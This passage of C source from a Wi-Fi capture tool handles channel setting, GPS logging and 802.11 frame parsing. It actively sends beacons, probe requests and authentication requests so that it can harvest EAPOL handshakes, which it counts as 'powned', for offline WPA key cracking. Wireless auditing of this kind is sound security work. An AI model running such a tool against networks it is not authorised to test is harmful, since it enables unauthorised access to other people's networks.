(aplist_ptr->essid_len != 0) && (aplist_ptr->essid[0] != 0)) { send_authenticationrequestopensystem(macfrx->addr2); } else { send_directed_proberequest(macfrx->addr2, essidtag->len, essidtag->data); } } if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_BEACON) == STATUS_BEACON) { printtimenet(macfrx->addr1, macfrx->addr2); printessid(aplist_ptr->essid_len, aplist_ptr->essid); fprintf(stdout, " [BEACON, SEQUENCE %d, AP CHANNEL %d]\n", macfrx->sequence >> 4,aplist_ptr->channel); } aplist_ptr++; return; } /*===========================================================================*/ static inline void programmende(int signum) { if((signum == SIGINT) || (signum == SIGTERM) || (signum == SIGKILL)) { wantstopflag = true; } return; } /*===========================================================================*/ static bool set_channel() { static int res; static struct iwreq pwrq; res = 0; memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.e = 0; pwrq.u.freq.flags = IW_FREQ_FIXED; pwrq.u.freq.m = channelscanlist[cpa]; res = ioctl(fd_socket, SIOCSIWFREQ, &pwrq); if(res < 0) { return false; } return true; } /*===========================================================================*/ static void remove_channel_from_scanlist(uint8_t c) { while(channelscanlist[c +1] != 0) { channelscanlist[c] = channelscanlist[c +1]; c++; } channelscanlist[c] = channelscanlist[c +1]; return; } /*===========================================================================*/ static void test_channels() { static uint8_t c; static int res; static struct iwreq pwrq; static int frequency; static int testchannel; usleep(10000); memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.e = 0; pwrq.u.freq.flags = IW_FREQ_FIXED; pwrq.u.freq.m = 2; res = ioctl(fd_socket, SIOCSIWFREQ, &pwrq); c = 0; while(channelscanlist[c] != 0) { testchannel = 0; frequency = 0; usleep(10000); memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.e = 0; pwrq.u.freq.flags = IW_FREQ_FIXED; pwrq.u.freq.m = channelscanlist[c]; res = ioctl(fd_socket, SIOCSIWFREQ, &pwrq); if(res < 0) { printf("warning: failed to set channel %d (%s) - removed this channel from scan list\n", channelscanlist[c], strerror(errno)); remove_channel_from_scanlist(c); continue; } usleep(10000); memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.e = 0; pwrq.u.freq.flags = IW_FREQ_FIXED; res = ioctl(fd_socket, SIOCGIWFREQ, &pwrq); if(res < 0) { printf("warning: failed to set channel %d (%s) - removed this channel from scan list\n", channelscanlist[c], strerror(errno)); remove_channel_from_scanlist(c); continue; } frequency = pwrq.u.freq.m; if(frequency > 100000) { frequency /= 100000; } if(frequency < 1000) { testchannel = frequency; } else if((frequency >= 2407) && (frequency <= 2474)) { testchannel = (frequency -2407)/5; } else if((frequency >= 2481) && (frequency <= 2487)) { testchannel = (frequency -2412)/5; } else if((frequency >= 5150) && (frequency <= 5875)) { testchannel = (frequency -5000)/5; } if(testchannel != channelscanlist[c]) { if(testchannel == frequency) { printf("warning: failed to set channel %d - removed this channel from scan list\n", channelscanlist[c]); } else { printf("warning: failed to set channel %d (%dMHz) - removed this channel from scan list\n", channelscanlist[c], frequency); } remove_channel_from_scanlist(c); continue; } c++; } return; } /*===========================================================================*/ static void show_channels() { static int c; static int res; static struct iwreq pwrq; static int frequency; static int testchannel; fprintf(stdout, "available channels:\n"); for(c = 0; c < 256; c++) { testchannel = 0; frequency = 0; memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.e = 0; pwrq.u.freq.flags = IW_FREQ_FIXED; pwrq.u.freq.m = c; res = ioctl(fd_socket, SIOCSIWFREQ, &pwrq); if(res >= 0) { memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.e = 0; pwrq.u.freq.flags = IW_FREQ_FIXED; res = ioctl(fd_socket, SIOCGIWFREQ, &pwrq); if(res >= 0) { frequency = pwrq.u.freq.m; if(frequency > 100000) { frequency /= 100000; } if(frequency < 1000) { testchannel = frequency; } else if((frequency >= 2407) && (frequency <= 2474)) { testchannel = (frequency -2407)/5; } else if((frequency >= 2481) && (frequency <= 2487)) { testchannel = (frequency -2412)/5; } else if((frequency >= 5150) && (frequency <= 5875)) { testchannel = (frequency -5000)/5; } if(testchannel > 0) { memset(&pwrq, 0, sizeof(pwrq)); strncpy( pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.txpower.value = -1; pwrq.u.txpower.fixed = 1; pwrq.u.txpower.disabled = 0; pwrq.u.txpower.flags = IW_TXPOW_DBM; if(ioctl(fd_socket, SIOCGIWTXPOW, &pwrq) < 0) { if(testchannel == frequency) { fprintf(stdout, " %3d\n", testchannel); } else { fprintf(stdout, " %3d / %4dMHz\n", testchannel, frequency); } } else { if(pwrq.u.txpower.value > 0) { if(testchannel == frequency) { fprintf(stdout, "%3d (%2d dBm)\n",testchannel, pwrq.u.txpower.value); } else { fprintf(stdout, "%3d / %4dMHz (%2d dBm)\n",testchannel, frequency, pwrq.u.txpower.value); } } } } } } } return; } /*===========================================================================*/ static inline bool activate_gpsd() { static int c; static struct sockaddr_in gpsd_addr; static int fdnum; static fd_set readfds; static struct timeval tvfd; char *gpsdptr; char *gpsd_lat = "\"lat\":"; char *gpsd_lon = "\"lon\":"; char *gpsd_alt = "\"alt\":"; char *gpsd_enable_json = "?WATCH={\"json\":true}"; char *gpsd_disable = "?WATCH={\"enable\":false}"; char *gpsd_version = "\"proto_major\":3"; char *gpsd_json = "\"json\":true"; char *gpsd_tpv = "\"class\":\"TPV\""; printf("connecting to GPSD...\n"); gpsd_len = 0; memset(&gpsddata, 0, GPSDDATA_MAX +1); memset(&gpsd_addr, 0, sizeof(struct sockaddr_in)); gpsd_addr.sin_family = AF_INET; gpsd_addr.sin_port = htons(2947); gpsd_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); if(connect(fd_socket_gpsd, (struct sockaddr*) &gpsd_addr, sizeof(gpsd_addr)) < 0) { perror("failed to connect to GPSD"); return false; } tvfd.tv_sec = 1; tvfd.tv_usec = 0; FD_ZERO(&readfds); FD_SET(fd_socket_gpsd, &readfds); fdnum = select(fd_socket_gpsd +1, &readfds, NULL, NULL, &tvfd); if(fdnum <= 0) { fprintf(stderr, "failed to select GPS socket\n"); return false; } if(FD_ISSET(fd_socket_gpsd, &readfds)) { gpsd_len = read(fd_socket_gpsd, gpsddata, GPSDDATA_MAX); if(gpsd_len <= 0) { fprintf(stderr ,"failed to get GPSD identification\n"); gpsd_len = 0; return false; } gpsddata[gpsd_len] = 0; if(strstr(gpsddata, gpsd_version) == NULL) { printf("unsupported GPSD version (not 3)\n"); gpsd_len = 0; return false; } } if(write(fd_socket_gpsd, gpsd_enable_json, 20) != 20) { perror("failed to activate GPSD WATCH"); gpsd_len = 0; return false; } tvfd.tv_sec = 1; tvfd.tv_usec = 0; FD_ZERO(&readfds); FD_SET(fd_socket_gpsd, &readfds); fdnum = select(fd_socket_gpsd +1, &readfds, NULL, NULL, &tvfd); if(fdnum <= 0) { fprintf(stderr, "GPSD timeout\n"); if(write(fd_socket_gpsd, gpsd_disable, 23) != 23) { perror("failed to terminate GPSD WATCH"); } gpsd_len = 0; return false; } if(FD_ISSET(fd_socket_gpsd, &readfds)) { gpsd_len = read(fd_socket_gpsd, gpsddata, GPSDDATA_MAX); if(gpsd_len <= 0) { fprintf(stderr, "failed to get GPSD protocol\n"); if(write(fd_socket_gpsd, gpsd_disable, 23) != 23) { perror("failed to terminate GPSD WATCH"); } gpsd_len = 0; return false; } gpsddata[gpsd_len] = 0; if(strstr(gpsddata, gpsd_json) == NULL) { printf("unsupported GPSD protocol (not json)\n"); if(write(fd_socket_gpsd, gpsd_disable, 23) != 23) { perror("failed to terminate GPSD WATCH"); } gpsd_len = 0; return false; } } printf("waiting up to 5 seconds to retrieve first position\n"); c = 0; while(c < 5) { tvfd.tv_sec = 5; tvfd.tv_usec = 0; FD_ZERO(&readfds); FD_SET(fd_socket_gpsd, &readfds); fdnum = select(fd_socket_gpsd +1, &readfds, NULL, NULL, &tvfd); if(fdnum <= 0) { fprintf(stderr, "failed to read initial GPSD position\n"); if(write(fd_socket_gpsd, gpsd_disable, 23) != 23) { perror("failed to terminate GPSD WATCH"); } gpsd_len = 0; return false; } if(FD_ISSET(fd_socket_gpsd, &readfds)) { gpsd_len = read(fd_socket_gpsd, gpsddata, GPSDDATA_MAX); if(gpsd_len <= 0) { perror("failed to get GPSD protocol"); if(write(fd_socket_gpsd, gpsd_disable, 23) != 23) { perror("failed to terminate GPSD WATCH"); } gpsd_len = 0; return false; } gpsddata[gpsd_len] = 0; if(strstr(gpsddata, gpsd_tpv) != NULL) { break; } } c++; } if(c < 5) { if((gpsdptr = strstr(gpsddata, gpsd_lat)) != NULL) { sscanf(gpsdptr +6, "%Lf", &lat); } if((gpsdptr = strstr(gpsddata, gpsd_lon)) != NULL) { sscanf(gpsdptr +6, "%Lf", &lon); } if((gpsdptr = strstr(gpsddata, gpsd_alt)) != NULL) { sscanf(gpsdptr +6, "%Lf", &alt); } if((lat == 0) && (lon == 0)) { if(write(fd_socket_gpsd, gpsd_disable, 23) != 23) { perror("failed to terminate GPSD WATCH"); gpsd_len = 0; return false; } } printf("GPSD activated\n"); return true; } fprintf(stderr, "failed to get GPSD position\n"); if(write(fd_socket_gpsd, gpsd_disable, 23) != 23) { perror("failed to terminate GPSD WATCH"); } gpsd_len = 0; return false; } /*===========================================================================*/ static inline void processpackets() { static int c; static int sa; static unsigned long long int statuscount; static unsigned long long int oldincommingcount1; static unsigned long long int oldincommingcount5; static char *gpsdptr; static char *gpsd_time = "\"time\":"; static char *gpsd_lat = "\"lat\":"; static char *gpsd_lon = "\"lon\":"; static char *gpsd_alt = "\"alt\":"; static rth_t *rth; static int fdnum; static fd_set readfds; static struct timeval tvfd; static uint8_t lastaddr1proberequest[6]; static uint8_t lastaddr2proberequest[6]; static uint16_t lastsequenceproberequest; static uint8_t lastaddr1proberesponse[6]; static uint8_t lastaddr2proberesponse[6]; static uint16_t lastsequenceproberesponse; static uint8_t lastaddr1authentication[6]; static uint8_t lastaddr2authentication[6]; static uint16_t lastsequenceauthentication; static uint8_t lastaddr1associationrequest[6]; static uint8_t lastaddr2associationrequest[6]; static uint16_t lastsequenceassociationrequest; static uint8_t lastaddr1associationresponse[6]; static uint8_t lastaddr2associationresponse[6]; static uint16_t lastsequenceassociationresponse; static uint8_t lastaddr1reassociationrequest[6]; static uint8_t lastaddr2reassociationrequest[6]; static uint16_t lastsequencereassociationrequest; static uint8_t lastaddr1reassociationresponse[6]; static uint8_t lastaddr2reassociationresponse[6]; static uint16_t lastsequencereassociationresponse; static uint8_t lastaddr1data[6]; static uint8_t lastaddr2data[6]; static uint16_t lastsequencedata; memset(&lastaddr1proberequest, 0, 6); memset(&lastaddr2proberequest, 0, 6); lastsequenceproberequest = 0; memset(&lastaddr1proberesponse, 0, 6); memset(&lastaddr2proberesponse, 0, 6); lastsequenceproberesponse = 0; memset(&lastaddr1authentication, 0, 6); memset(&lastaddr2authentication, 0, 6); lastsequenceauthentication = 0; memset(&lastaddr1associationrequest, 0, 6); memset(&lastaddr2associationrequest, 0, 6); lastsequenceassociationrequest = 0; memset(&lastaddr1associationresponse, 0, 6); memset(&lastaddr2associationresponse, 0, 6); lastsequenceassociationresponse = 0; memset(&lastaddr1reassociationrequest, 0, 6); memset(&lastaddr2reassociationrequest, 0, 6); lastsequencereassociationrequest = 0; memset(&lastaddr1reassociationresponse, 0, 6); memset(&lastaddr2reassociationresponse, 0, 6); lastsequencereassociationresponse = 0; memset(&lastaddr1data, 0, 6); memset(&lastaddr2data, 0, 6); lastsequencedata = 0; sa = 1; if(gpsdflag == true) { if(activate_gpsd() == false) { gpsdflag = false; } else { if((gpsdptr = strstr(gpsddata, gpsd_time)) != NULL) { sscanf(gpsdptr +8, "%d-%d-%dT%d:%d:%d;", &year, &month, &day, &hour, &minute, &second); } if((gpsdptr = strstr(gpsddata, gpsd_lat)) != NULL) { sscanf(gpsdptr +6, "%Lf", &lat); } if((gpsdptr = strstr(gpsddata, gpsd_lon)) != NULL) { sscanf(gpsdptr +6, "%Lf", &lon); } if((gpsdptr = strstr(gpsddata, gpsd_alt)) != NULL) { sscanf(gpsdptr +6, "%Lf", &alt); } printf("\e[?25l\nstart capturing (stop with ctrl+c)\n" "GPS LATITUDE.............: %Lf\n" "GPS LONGITUDE............: %Lf\n" "GPS ALTITUDE.............: %Lf\n" "GPS DATE.................: %02d.%02d.%04d\n" "GPS TIME.................: %02d:%02d:%02d\n" "INTERFACE................: %s\n" "ERRORMAX.................: %d errors\n" "FILTERLIST...............: %d entries\n" "MAC CLIENT...............: %06x%06x\n" "MAC ACCESS POINT.........: %06x%06x (incremented on every new ESSID)\n" "EAPOL TIMEOUT............: %d\n" "REPLAYCOUNT..............: %llu\n" "ANONCE...................: ", lat, lon, alt, day, month, year, hour, minute, second, interfacename, maxerrorcount, filterlist_len, myouista, mynicsta, myouiap, mynicap, eapoltimeout, rcrandom); for(c = 0; c < 32; c++) { printf("%02x", anoncerandom[c]); } printf("\n\n"); sa = 2; } } if(gpsdflag == false) { printf("\e[?25l\nstart capturing (stop with ctrl+c)\n" "INTERFACE................: %s\n" "ERRORMAX.................: %d errors\n" "FILTERLIST...............: %d entries\n" "MAC CLIENT...............: %06x%06x\n" "MAC ACCESS POINT.........: %06x%06x (incremented on every new client)\n" "EAPOL TIMEOUT............: %d\n" "REPLAYCOUNT..............: %llu\n" "ANONCE...................: ", interfacename, maxerrorcount, filterlist_len, myouista, mynicsta, myouiap, mynicap, eapoltimeout, rcrandom); for(c = 0; c < 32; c++) { printf("%02x", anoncerandom[c]); } printf("\n\n"); } gettimeofday(&tv, NULL); timestamp = ((uint64_t)tv.tv_sec * 1000000) + tv.tv_usec; timestampstart = timestamp; tvfd.tv_sec = 1; tvfd.tv_usec = 0; statuscount = 1; oldincommingcount1 = 0; oldincommingcount5 = 0; if(set_channel() == false) { fprintf(stderr, "failed to set channel\n"); globalclose(); } if(activescanflag == false) { send_broadcastbeacon(); send_undirected_proberequest(); } while(1) { if(gpiobutton > 0) { if(GET_GPIO(gpiobutton) > 0) { globalclose(); } } if(wantstopflag == true) { globalclose(); } if(errorcount >= maxerrorcount) { fprintf(stderr, "\nmaximum number of errors is reached\n"); globalclose(); } FD_ZERO(&readfds); FD_SET(fd_socket, &readfds); FD_SET(fd_socket_gpsd, &readfds); fdnum = select(fd_socket +sa, &readfds, NULL, NULL, &tvfd); if(fdnum < 0) { errorcount++; continue; } else if(FD_ISSET(fd_socket_gpsd, &readfds)) { gpsd_len = read(fd_socket_gpsd, gpsddata, GPSDDATA_MAX); if(gpsd_len < 0) { perror("\nfailed to read GPS data"); errorcount++; continue; } if(gpsd_len >= 0) { gpsddata[gpsd_len] = 0; #ifdef DEBUG fprintf(stdout, "\nGPS: %s\n", gpsddata); #endif } continue; } else if(FD_ISSET(fd_socket, &readfds)) { packet_len = read(fd_socket, epb +EPB_SIZE, PCAPNG_MAXSNAPLEN); if(packet_len == 0) { fprintf(stderr, "\ninterface went down\n"); globalclose(); } if(packet_len < 0) { perror("\nfailed to read packet"); errorcount++; continue; } #ifdef DEBUG debugprint(packet_len, &epb[EPB_SIZE]); #endif if(packet_len < (int)RTH_SIZE) { fprintf(stderr, "\ngot damged radiotap header\n"); errorcount++; continue; } if(ioctl(fd_socket, SIOCGSTAMP, &tv) < 0) { perror("\nfailed to get time"); errorcount++; continue; } timestamp = ((uint64_t)tv.tv_sec * 1000000) + tv.tv_usec; } else { if((statuscount %5) == 0) { if(gpiostatusled > 0) { GPIO_SET = 1 << gpiostatusled; if(incommingcount != oldincommingcount5) { usleep(GPIO_DELAY); GPIO_CLR = 1 << gpiostatusled; } oldincommingcount5 = incommingcount; } if(gpsdflag == false) { printf("\33[2K\rINFO: cha=%d, rx=%llu, rx(dropped)=%llu, tx=%llu, powned=%llu, err=%d", channelscanlist[cpa], incommingcount, droppedcount, outgoingcount, pownedcount, errorcount); } else { if((gpsdptr = strstr(gpsddata, gpsd_time)) != NULL) { sscanf(gpsdptr +8, "%d-%d-%dT%d:%d:%d;", &year, &month, &day, &hour, &minute, &second); } if((gpsdptr = strstr(gpsddata, gpsd_lat)) != NULL) { sscanf(gpsdptr +6, "%Lf", &lat); } if((gpsdptr = strstr(gpsddata, gpsd_lon)) != NULL) { sscanf(gpsdptr +6, "%Lf", &lon); } if((gpsdptr = strstr(gpsddata, gpsd_alt)) != NULL) { sscanf(gpsdptr +6, "%Lf", &alt); } printf("\33[2K\rINFO: cha=%d, rx=%llu, rx(dropped)=%llu, tx=%llu, powned=%llu, err=%d, lat=%Lf, lon=%Lf, alt=%Lf, gpsdate=%02d.%02d.%04d, gpstime=%02d:%02d:%02d", channelscanlist[cpa], incommingcount, droppedcount, outgoingcount, pownedcount, errorcount, lat, lon, alt, day, month, year, hour, minute, second); } } if(((statuscount %staytime) == 0) || ((staytimeflag != true) && (incommingcount == oldincommingcount1))) { cpa++; if(channelscanlist[cpa] == 0) { cpa = 0; } if(set_channel() == true) { if(activescanflag == false) { send_broadcastbeacon(); send_undirected_proberequest(); } } else { printf("\nfailed to set channel\n"); globalclose(); } } oldincommingcount1 = incommingcount; tvfd.tv_sec = 1; tvfd.tv_usec = 0; statuscount++; continue; } packet_ptr = &epb[EPB_SIZE]; rth = (rth_t*)packet_ptr; ieee82011_ptr = packet_ptr +le16toh(rth->it_len); ieee82011_len = packet_len -le16toh(rth->it_len); if(rth->it_present == 0) { continue; } if((rth->it_present & 0x20) != 0) { incommingcount++; } if(packet_len < (int)RTH_SIZE +(int)MAC_SIZE_NORM) { droppedcount++; continue; } macfrx = (mac_t*)ieee82011_ptr; if((macfrx->from_ds == 1) && (macfrx->to_ds == 1)) { payload_ptr = ieee82011_ptr +MAC_SIZE_LONG; payload_len = ieee82011_len -MAC_SIZE_LONG; } else { payload_ptr = ieee82011_ptr +MAC_SIZE_NORM; payload_len = ieee82011_len -MAC_SIZE_NORM; } if(macfrx->type == IEEE80211_FTYPE_MGMT) { if((rth->it_present & 0x20) == 0) { continue; } if(memcmp(macfrx->addr2, &mac_broadcast, 6) == 0) { droppedcount++; continue; } if(macfrx->subtype == IEEE80211_STYPE_BEACON) { if(filtermode == 3) { if(checkfilterlistentry(macfrx->addr2) == false) { continue; } } process80211beacon(); continue; } if(macfrx->subtype == IEEE80211_STYPE_PROBE_REQ) { if((macfrx->sequence == lastsequenceproberequest) && (memcmp(macfrx->addr1, &lastaddr1proberequest, 6) == 0) && (memcmp(macfrx->addr2, &lastaddr2proberequest, 6) == 0)) { droppedcount++; continue; } lastsequenceproberequest = macfrx->sequence; memcpy(&lastaddr1proberequest, macfrx->addr1, 6); memcpy(&lastaddr2proberequest, macfrx->addr2, 6); if(filtermode == 3) { if((checkfilterlistentry(macfrx->addr1) == false) && (checkfilterlistentry(macfrx->addr2) == false)) { continue; } } if(memcmp(macfrx->addr1, &mac_broadcast, 6) == 0) { process80211probe_req(); } else if(memcmp(macfrx->addr1, &mac_null, 6) == 0) { process80211probe_req(); } else { process80211directed_probe_req(); } continue; } if(macfrx->subtype == IEEE80211_STYPE_PROBE_RESP) { if((macfrx->sequence == lastsequenceproberesponse) && (memcmp(macfrx->addr1, &lastaddr1proberesponse, 6) == 0) && (memcmp(macfrx->addr2, &lastaddr2proberesponse, 6) == 0)) { droppedcount++; continue; } lastsequenceproberesponse = macfrx->sequence; memcpy(&lastaddr1proberesponse, macfrx->addr1, 6); memcpy(&lastaddr2proberesponse, macfrx->addr2, 6); if(filtermode == 3) { if((checkfilterlistentry(macfrx->addr1) == false) && (checkfilterlistentry(macfrx->addr2) == false)) { continue; } } process80211probe_resp(); continue; } if(macfrx->subtype == IEEE80211_STYPE_AUTH) { if((macfrx->sequence == lastsequenceauthentication) && (memcmp(macfrx->addr1, &lastaddr1authentication, 6) == 0) && (memcmp(macfrx->addr2, &lastaddr2authentication, 6) == 0)) { droppedcount++; continue; } lastsequenceauthentication = macfrx->sequence; memcpy(&lastaddr1authentication, macfrx->addr1, 6); memcpy(&lastaddr2authentication, macfrx->addr2, 6); if(filtermode == 3) { if((checkfilterlistentry(macfrx->addr1) == false) && (checkfilterlistentry(macfrx->addr2) == false)) { continue; } } process80211authentication(); continue; } if(macfrx->subtype == IEEE80211_STYPE_ASSOC_REQ) { if((macfrx->sequence == lastsequenceassociationrequest) && (memcmp(macfrx->addr1, &lastaddr1associationrequest, 6) == 0) && (memcmp(macfrx->addr2, &lastaddr2associationrequest, 6) == 0)) { droppedcount++; continue; } lastsequenceassociationrequest = macfrx->sequence; memcpy(&lastaddr1associationrequest, macfrx->addr1, 6); memcpy(&lastaddr2associationrequest, macfrx->addr2, 6); if(filtermode == 3) { if((checkfilterlistentry(macfrx->addr1) == false) && (checkfilterlistentry(macfrx->addr2) == false)) { continue; } } process80211association_req(); continue; } if(macfrx->subtype == IEEE80211_STYPE_ASSOC_RESP) { if((macfrx->sequence == lastsequenceassociationresponse) && (memcmp(macfrx->addr1, &lastaddr1associationresponse, 6) == 0) && (memcmp(macfrx->addr2, &lastaddr2associationresponse, 6) == 0)) { droppedcount++; continue; } lastsequenceassociationresponse = macfrx->sequence; memcpy(&lastaddr1associationresponse, macfrx->addr1, 6); memcpy(&lastaddr2associationresponse, macfrx->addr2, 6); if(filtermode == 3) { if((checkfilterlistentry(macfrx->addr1) == false) && (checkfilterlistentry(macfrx->addr2) == false)) { continue; } } process80211association_resp(); continue; } if(macfrx->subtype == IEEE80211_STYPE_REASSOC_REQ) { if((macfrx->sequence == lastsequencereassociationrequest) && (memcmp(macfrx->addr1, &lastaddr1reassociationrequest, 6) == 0) && (memcmp(macfrx->addr2, &lastaddr2reassociationrequest, 6) == 0)) { droppedcount++; continue; } lastsequencereassociationrequest = macfrx->sequence; memcpy(&lastaddr1reassociationrequest, macfrx->addr1, 6); memcpy(&lastaddr2reassociationrequest, macfrx->addr2, 6); if(filtermode == 3) { if((checkfilterlistentry(macfrx->addr1) == false) && (checkfilterlistentry(macfrx->addr2) == false)) { continue; } } process80211reassociation_req(); continue; } if(macfrx->subtype == IEEE80211_STYPE_REASSOC_RESP) { if((macfrx->sequence == lastsequencereassociationresponse) && (memcmp(macfrx->addr1, &lastaddr1reassociationresponse, 6) == 0) && (memcmp(macfrx->addr2, &lastaddr2reassociationresponse, 6) == 0)) { droppedcount++; continue; } lastsequencereassociationresponse = macfrx->sequence; memcpy(&lastaddr1reassociationresponse, macfrx->addr1, 6); memcpy(&lastaddr2reassociationresponse, macfrx->addr2, 6); if(filtermode == 3) { if((checkfilterlistentry(macfrx->addr1) == false) && (checkfilterlistentry(macfrx->addr2) == false)) { continue; } } process80211reassociation_resp(); continue; } droppedcount++; continue; } if(macfrx->type == IEEE80211_FTYPE_CTL) { droppedcount++; continue; } if(macfrx->type == IEEE80211_FTYPE_DATA) { if((macfrx->sequence == lastsequencedata) && (memcmp(macfrx->addr1, &lastaddr1data, 6) == 0) && (memcmp(macfrx->addr2, &lastaddr2data, 6) == 0)) { droppedcount++; continue; } lastsequencedata = macfrx->sequence; memcpy(&lastaddr1data, macfrx->addr1, 6); memcpy(&lastaddr2data, macfrx->addr2, 6); if((macfrx->subtype & IEEE80211_STYPE_QOS_DATA) == IEEE80211_STYPE_QOS_DATA) { payload_ptr += QOS_SIZE; payload_len -= QOS_SIZE; } if( macfrx->subtype == IEEE80211_STYPE_NULLFUNC) { continue; } if(payload_len < (int)LLC_SIZE) { continue; } llc_ptr = payload_ptr; llc = (llc_t*)llc_ptr; if(filtermode == 3) { if((checkfilterlistentry(macfrx->addr1) == false) && (checkfilterlistentry(macfrx->addr2) == false)) { continue; } } if(((ntohs(llc->type)) == LLC_TYPE_AUTH) && (llc->dsap == LLC_SNAP) && (llc->ssap == LLC_SNAP)) { process80211eap(); continue; } if(((ntohs(llc->type)) == LLC_TYPE_IPV4) && (llc->dsap == LLC_SNAP) && (llc->ssap == LLC_SNAP)) { if(fd_ippcapng != 0) { writeepb(fd_ippcapng); } continue; } if(((ntohs(llc->type)) == LLC_TYPE_IPV6) && (llc->dsap == LLC_SNAP) && (llc->ssap == LLC_SNAP)) { if(fd_ippcapng != 0) { writeepb(fd_ippcapng); } continue; } if(macfrx->protected ==1) { if(fd_weppcapng != 0) { mpdu_ptr = payload_ptr; mpdu = (mpdu_t*)mpdu_ptr; if(((mpdu->keyid >> 5) &1) == 0) { writeepb(fd_weppcapng); } } continue; } droppedcount++; } } return; } /*===========================================================================*/ static inline void processrcascan() { static int fdnum; static long long int statuscount; static rth_t *rth; static fd_set readfds; static struct timeval tvfd; gettimeofday(&tv, NULL); timestamp = ((uint64_t)tv.tv_sec * 1000000) + tv.tv_usec; timestampstart = timestamp; tvfd.tv_sec = 1; tvfd.tv_usec = 0; statuscount = 1; if(set_channel() == false) { fprintf(stderr, "\nfailed to set channel\n"); globalclose(); } send_undirected_proberequest(); while(1) { if(gpiobutton > 0) { if(GET_GPIO(gpiobutton) > 0) { globalclose(); } } if(wantstopflag == true) { globalclose(); } if(errorcount >= maxerrorcount) { fprintf(stderr, "\nmaximum number of errors is reached\n"); globalclose(); } FD_ZERO(&readfds); FD_SET(fd_socket, &readfds); fdnum = select(fd_socket +1, &readfds, NULL, NULL, &tvfd); if(fdnum < 0) { errorcount++; continue; } else if(fdnum > 0 && FD_ISSET(fd_socket, &readfds)) { packet_len = read(fd_socket, epb +EPB_SIZE, PCAPNG_MAXSNAPLEN); if(packet_len == 0) { fprintf(stderr, "\ninterface went down\n"); globalclose(); } if(packet_len < 0) { perror("\nfailed to read packet"); errorcount++; continue; } if(packet_len < (int)RTH_SIZE) { fprintf(stderr, "\ngot damged radiotap header\n"); errorcount++; continue; } if(ioctl(fd_socket, SIOCGSTAMP, &tv) < 0) { perror("\nfailed to get time"); errorcount++; continue; } timestamp = ((uint64_t)tv.tv_sec * 1000000) + tv.tv_usec; } else { if((statuscount %5) == 0) { if(gpiostatusled > 0) { GPIO_SET = 1 << gpiostatusled; usleep(GPIO_DELAY); GPIO_CLR = 1 << gpiostatusled; } } if((statuscount %2) == 0) { printapinfo(); cpa++; if(channelscanlist[cpa] == 0) { cpa = 0; } if(set_channel() == true) { send_undirected_proberequest(); } else { printf("\nfailed to set channel\n"); globalclose(); } } tvfd.tv_sec = 1; tvfd.tv_usec = 0; statuscount++; continue; } if(packet_len < (int)RTH_SIZE +(int)MAC_SIZE_NORM) { continue; } packet_ptr = &epb[EPB_SIZE]; rth = (rth_t*)packet_ptr; ieee82011_ptr = packet_ptr +le16toh(rth->it_len); ieee82011_len = packet_len -le16toh(rth->it_len); if(rth->it_present == 0) { continue; } if((rth->it_present & 0x20) == 0) { continue; } incommingcount++; macfrx = (mac_t*)ieee82011_ptr; if((macfrx->from_ds == 1) && (macfrx->to_ds == 1)) { payload_ptr = ieee82011_ptr +MAC_SIZE_LONG; payload_len = ieee82011_len -MAC_SIZE_LONG; } else { payload_ptr = ieee82011_ptr +MAC_SIZE_NORM; payload_len = ieee82011_len -MAC_SIZE_NORM; } if(macfrx->type == IEEE80211_FTYPE_MGMT) { if(macfrx->subtype == IEEE80211_STYPE_BEACON) { process80211rcascanbeacon(); } else if(macfrx->subtype == IEEE80211_STYPE_PROBE_RESP) { process80211rcascanproberesponse(); } } if(fd_rcascanpcapng != 0) { writeepb(fd_rcascanpcapng); } } return; } /*===========================================================================*/ static bool ischannelindefaultlist(uint8_t userchannel) { static uint8_t cpd; cpd = 0; while(channeldefaultlist[cpd] != 0) { if(userchannel == channeldefaultlist[cpd]) { return true; } cpd++; } return false; } /*===========================================================================*/ static inline bool processuserscanlist(char *optarglist) { static char *ptr; static char *userscanlist; userscanlist = strdupa(optarglist); cpa = 0; ptr = strtok(userscanlist, ","); while(ptr != NULL) { channelscanlist[cpa] = atoi(ptr); if(ischannelindefaultlist(channelscanlist[cpa]) == false) { return false; } ptr = strtok(NULL, ","); cpa++; if(cpa > 127) { return false; } } channelscanlist[cpa] = 0; cpa = 0; return true; } /*===========================================================================*/ static inline size_t chop(char *buffer, size_t len) { static char *ptr; ptr = buffer +len -1; while(len) { if (*ptr != '\n') break; *ptr-- = 0; len--; } while(len) { if (*ptr != '\r') break; *ptr-- = 0; len--; } return len; } /*---------------------------------------------------------------------------*/ static inline int fgetline(FILE *inputstream, size_t size, char *buffer) { static size_t len; static char *buffptr; if(feof(inputstream)) return -1; buffptr = fgets (buffer, size, inputstream); if(buffptr == NULL) return -1; len = strlen(buffptr); len = chop(buffptr, len); return len; } /*===========================================================================*/ static inline int readfilterlist(char *listname, maclist_t *zeiger) { static int len; static int c; static int entries; static FILE *fh_filter; static char linein[FILTERLIST_LINE_LEN]; if((fh_filter = fopen(listname, "r")) == NULL) { fprintf(stderr, "opening blacklist failed %s\n", listname); return 0; } zeiger = filterlist; entries = 0; c = 1; while(entries < FILTERLIST_MAX) { if((len = fgetline(fh_filter, FILTERLIST_LINE_LEN, linein)) == -1) { break; } if(len < 12) { c++; continue; } if(linein[0x0] == '#') { c++; continue; } if(hex2bin(&linein[0x0], zeiger->addr, 6) == true) { zeiger++; entries++; } else { fprintf(stderr, "reading blacklist line %d failed: %s\n", c, linein); } c++; } fclose(fh_filter); return entries; } /*===========================================================================*/ static bool initgpio(int gpioperi) { static int fd_mem; fd_mem = open("/dev/mem", O_RDWR|O_SYNC); if(fd_mem < 0) { fprintf(stderr, "failed to get device memory\n"); return false; } gpio_map = mmap(NULL, 